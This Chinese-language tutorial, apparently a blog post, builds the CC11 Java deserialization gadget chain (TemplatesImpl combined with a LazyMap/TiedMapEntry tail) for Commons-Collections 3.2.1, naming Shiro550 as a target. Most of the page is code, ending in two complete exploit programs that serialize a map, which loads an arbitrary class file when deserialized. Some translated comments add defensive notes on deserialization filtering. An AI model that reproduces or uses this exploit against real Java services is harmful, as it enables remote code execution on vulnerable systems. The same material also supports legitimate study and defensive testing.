前言
这条链子的主要作用是可以在 Commons-Collections 3.2.1 版本中使用,而且是无数组的方法。这条链子适用于 Shiro550 漏洞。
CC11链子流程
CC2 + CC6的结合体
CC2
TemplatesImpl.newTransformer() --> defineClass->newInstance
调用 TemplatesImpl类的 newTransformer方法
TemplatesImpl templates = new TemplatesImpl(); templates.newTransformer();
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import java.lang.reflect.Field;

/**
 * Step 1 of the CC11 walkthrough: construct a {@code TemplatesImpl} and write
 * its private {@code _name} field through reflection.
 *
 * <p>This listing only sets the field; {@code newTransformer()} is not called
 * here, so nothing is loaded or executed. It demonstrates that the private
 * field is reachable once {@code setAccessible(true)} succeeds.
 */
public class C11 {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> tc = templates.getClass();
        // _name is private on TemplatesImpl; the reflective write needs setAccessible(true).
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");
    }
}
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

/**
 * Step 2 of the CC11 walkthrough (the CC2 half): fill the three
 * {@code TemplatesImpl} fields the chain depends on ({@code _name},
 * {@code _bytecodes}, {@code _tfactory}) and then call
 * {@code newTransformer()}, which per the chain sketch above is where the
 * supplied class bytes are defined and instantiated.
 *
 * <p>Defensive note: in this listing the class bytes come from a fixed local
 * file, and the trigger is a direct method call. In the real attack surface
 * the same object graph arrives inside a serialized stream, so the control
 * that matters is whatever sits in front of
 * {@code ObjectInputStream.readObject} (a JEP 290 {@code ObjectInputFilter}
 * allow-list, or not deserializing untrusted input at all).
 */
public class C11 {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> tc = templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        // Class file read verbatim from a hard-coded path; its contents are never validated.
        byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
        byte[][] codes = {
            eval};
        bytecodes.set(templates,codes);
        // Original author's note (translated): found by reading readObject --
        // this field itself does not take part in serialization, so it has
        // to be populated after construction.
        Field tfactory = tc.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
        // Original author's note (translated): initializes / loads the class.
        templates.newTransformer();
    }
}
CC6
CC6的链子流程:
xxx.readObject() HashMap.put() HashMap.hash() TiedMapEntry.hashCode() TiedMapEntry.getValue() LazyMap.get() ChainedTransformer.transform() InvokerTransformer.transform() Runtime.exec()
尾部链
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

/**
 * CC6 tail chain wired to the CC2 {@code TemplatesImpl} payload.
 *
 * <p>Compared with the previous listing, the direct
 * {@code templates.newTransformer()} call is commented out and replaced by a
 * {@code ChainedTransformer} (constant -> invoke "newTransformer") that
 * drives a {@code LazyMap}. The trigger in this listing is still an explicit
 * call, {@code tiedMapEntry.getValue()}, which per the chain sketch above
 * resolves to {@code LazyMap.get()} and therefore to the transformer chain.
 * No serialization happens yet.
 *
 * <p>Defensive note: every class on this chain is an ordinary library type;
 * the exposure is that {@code HashMap.readObject} recomputes key hashes on
 * any {@code ObjectInputStream} that accepts these classes. Class-level
 * allow-listing on deserialization (JEP 290) is the control that breaks it.
 */
public class C11 {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> tc = templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        // Class file read verbatim from a hard-coded path; its contents are never validated.
        byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
        byte[][] codes = {
            eval};
        bytecodes.set(templates,codes);
        Field tfactory = tc.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
        // Original author's note (translated): initializes / loads the class.
        // templates.newTransformer();
        // Original author's note (translated): start of the CC6 part.
        Transformer[] transformers = {
            new ConstantTransformer(templates),
            new InvokerTransformer("newTransformer",null,null)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        // LazyMap invokes the factory for any key that is absent.
        Map lazymap = LazyMap.decorate(new HashMap<>(),chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,null);
        // Explicit trigger for this intermediate listing: getValue() -> LazyMap.get(null).
        tiedMapEntry.getValue();
    }
}
结合入口链
xxx.readObject() HashMap.put() --自动调用--> 后续利用链.hashCode()
所以我们可以构造exp代码:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

/**
 * Same tail chain as the previous listing, with the explicit
 * {@code tiedMapEntry.getValue()} replaced by {@code lazymap.put(tiedMapEntry, null)}.
 *
 * <p>The point of the substitution (see the entry-chain sketch above) is that
 * {@code HashMap.put} calls {@code hashCode()} on the key, and
 * {@code TiedMapEntry.hashCode()} goes through {@code getValue()} -- the same
 * path {@code HashMap.readObject} takes when it rebuilds the table. This
 * listing still has no serialization step, so the chain fires at construction
 * time; the next section is about moving that to deserialization only.
 */
public class C11 {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> tc = templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        // Class file read verbatim from a hard-coded path; its contents are never validated.
        byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
        byte[][] codes = {
            eval};
        bytecodes.set(templates,codes);
        Field tfactory = tc.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
        // Original author's note (translated): initializes / loads the class.
        // templates.newTransformer();
        Transformer[] transformers = {
            new ConstantTransformer(templates),
            new InvokerTransformer("newTransformer",null,null)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map lazymap = LazyMap.decorate(new HashMap<>(),chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,null);
        // Original author's note (translated): getValue() replaced by hashCode().
        // tiedMapEntry.getValue();
        // put() hashes the key, which reaches TiedMapEntry.hashCode() -> getValue().
        lazymap.put(tiedMapEntry,null);
    }
}
解决:只在反序列化时执行命令
如果我们在序列化之前修改这行代码中的 chainedTransformer,它在序列化阶段就不会执行命令了
Map lazymap = LazyMap.decorate(new HashMap<>(),chainedTransformer); -->修改为 Map lazymap = LazyMap.decorate(new HashMap<>(),new ConstantTransformer(1));
Class<LazyMap> lazyMapClass = LazyMap.class; Field factory = lazyMapClass.getDeclaredField("factory"); factory.setAccessible(true); factory.set(lazymap,chainedTransformer);
lazymap.remove(null);
CC6+CC2有数组最终exp代码
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

/**
 * CC6 + CC2 combined, array-based variant, with a serialize / deserialize
 * round trip so the chain fires only on {@code readObject}.
 *
 * <p>Ordering is what makes this listing different from the previous one
 * (see the "only on deserialization" section above):
 * <ol>
 *   <li>{@code lazymap} is first decorated with a harmless
 *       {@code ConstantTransformer(1)} so that the {@code put} below does not
 *       invoke the real chain at construction time;</li>
 *   <li>{@code lazymap.put(tiedMapEntry, null)} inserts the key (and, as a
 *       side effect of the lookup inside {@code hashCode()}, a {@code null -> 1}
 *       entry);</li>
 *   <li>{@code lazymap.remove(null)} deletes that side-effect entry so the key
 *       is absent again when the map is rebuilt on the receiving side;</li>
 *   <li>the {@code factory} field is then swapped to the real
 *       {@code ChainedTransformer} by reflection.</li>
 * </ol>
 * {@code hashMap} -- the map {@code lazymap} decorates -- is what gets
 * serialized; {@code lazymap} travels with it as a field of the
 * {@code TiedMapEntry} key.
 *
 * <p>Defensive note: the sink is {@code unserialize}, a bare
 * {@code ObjectInputStream.readObject} with no {@code ObjectInputFilter}.
 * Any deserialization endpoint that accepts these classes is equivalent.
 */
public class C11 {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> tc = templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        // Class file read verbatim from a hard-coded path; its contents are never validated.
        byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
        byte[][] codes = {
            eval};
        bytecodes.set(templates,codes);
        Field tfactory = tc.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
        // Original author's note (translated): initializes / loads the class.
        // templates.newTransformer();
        Transformer[] transformers = {
            new ConstantTransformer(templates),
            new InvokerTransformer("newTransformer",null,null)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> hashMap = new HashMap<>();
        // Placeholder factory: keeps the construction-time put() inert.
        Map lazymap = LazyMap.decorate(hashMap,new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,null);
        // Original author's note (translated): getValue() replaced by hashCode().
        // tiedMapEntry.getValue();
        lazymap.put(tiedMapEntry,null);
        // Undo the null -> 1 entry that the lookup inside hashCode() created.
        lazymap.remove(null);
        // Swap in the real factory only after the map is in its final shape.
        Class<LazyMap> lazyMapClass = LazyMap.class;
        Field factory = lazyMapClass.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(lazymap,chainedTransformer);
        serialize(hashMap);
        unserialize("ser.bin");
    }

    /**
     * Writes {@code obj} to {@code ser.bin} in the working directory.
     *
     * @param obj object graph to serialize
     * @throws IOException if the file cannot be written
     */
    public static void serialize(Object obj) throws IOException{
        // NOTE(review): the stream is never closed; try-with-resources would fix this.
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    /**
     * Reads one object from {@code Filename} with a plain {@code ObjectInputStream}.
     *
     * <p>This is the sink of the whole page: {@code readObject} reconstructs
     * whatever class graph the file contains, with no class allow-list
     * ({@code ObjectInputFilter}) applied.
     *
     * @param Filename path of the serialized stream
     * @return the deserialized object
     * @throws IOException            if the file cannot be read
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     */
    public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
        // NOTE(review): the stream is never closed; try-with-resources would fix this.
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}
CC11无数组exp构造
修改有数组的CC11代码如下:
Transformer[] transformers = {
new ConstantTransformer(templates), new InvokerTransformer("newTransformer",null,null) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); --->修改为 InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);
修改的代码:
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,templates); // tiedMapEntry.getValue(); hashCode代替 lazymap.put(tiedMapEntry,null); lazymap.remove(templates); Class<LazyMap> lazyMapClass = LazyMap.class; Field factory = lazyMapClass.getDeclaredField("factory"); factory.setAccessible(true); factory.set(lazymap,invokerTransformer);
最终exp代码:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

/**
 * CC11, array-free variant: the final listing of the page.
 *
 * <p>Differences from the array-based listing above:
 * <ul>
 *   <li>no {@code Transformer[]} / {@code ChainedTransformer}; a single
 *       {@code InvokerTransformer("newTransformer")} is the factory;</li>
 *   <li>{@code templates} itself is the {@code TiedMapEntry} key, so the
 *       {@code LazyMap} lookup hands {@code templates} to the factory and the
 *       invoker calls {@code newTransformer()} on it directly;</li>
 *   <li>{@code lazymap.remove(templates)} (instead of {@code remove(null)})
 *       clears the entry the construction-time {@code put} left behind.</li>
 * </ul>
 * The placeholder-factory / remove / reflective-swap ordering is the same as
 * in the array-based listing and exists so the chain fires only inside
 * {@code readObject}.
 *
 * <p>Defensive note: the absence of a {@code Transformer[]} matters only for
 * environments that block that array type; a class allow-list on
 * {@code ObjectInputStream} (JEP 290 {@code ObjectInputFilter}) that does not
 * admit the Commons-Collections functor types stops both variants.
 * {@code Transformer} and {@code ChainedTransformer} are imported but unused here.
 */
public class C11 {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> tc = templates.getClass();
        Field name = tc.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");
        Field bytecodes = tc.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        // Class file read verbatim from a hard-coded path; its contents are never validated.
        byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
        byte[][] codes = {
            eval};
        bytecodes.set(templates,codes);
        Field tfactory = tc.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
        // Original author's note (translated): initializes / loads the class.
        // templates.newTransformer();
        // Single factory; the LazyMap key (templates) becomes the invocation target.
        InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);
        HashMap<Object, Object> hashMap = new HashMap<>();
        // Placeholder factory: keeps the construction-time put() inert.
        Map lazymap = LazyMap.decorate(hashMap,new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap,templates);
        // Original author's note (translated): getValue() replaced by hashCode().
        // tiedMapEntry.getValue();
        lazymap.put(tiedMapEntry,null);
        // Undo the templates -> 1 entry that the lookup inside hashCode() created.
        lazymap.remove(templates);
        // Swap in the real factory only after the map is in its final shape.
        Class<LazyMap> lazyMapClass = LazyMap.class;
        Field factory = lazyMapClass.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(lazymap,invokerTransformer);
        serialize(hashMap);
        unserialize("ser.bin");
    }

    /**
     * Writes {@code obj} to {@code ser.bin} in the working directory.
     *
     * @param obj object graph to serialize
     * @throws IOException if the file cannot be written
     */
    public static void serialize(Object obj) throws IOException{
        // NOTE(review): the stream is never closed; try-with-resources would fix this.
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    /**
     * Reads one object from {@code Filename} with a plain {@code ObjectInputStream}.
     *
     * <p>This is the sink of the whole page: {@code readObject} reconstructs
     * whatever class graph the file contains, with no class allow-list
     * ({@code ObjectInputFilter}) applied.
     *
     * @param Filename path of the serialized stream
     * @return the deserialized object
     * @throws IOException            if the file cannot be read
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     */
    public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
        // NOTE(review): the stream is never closed; try-with-resources would fix this.
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}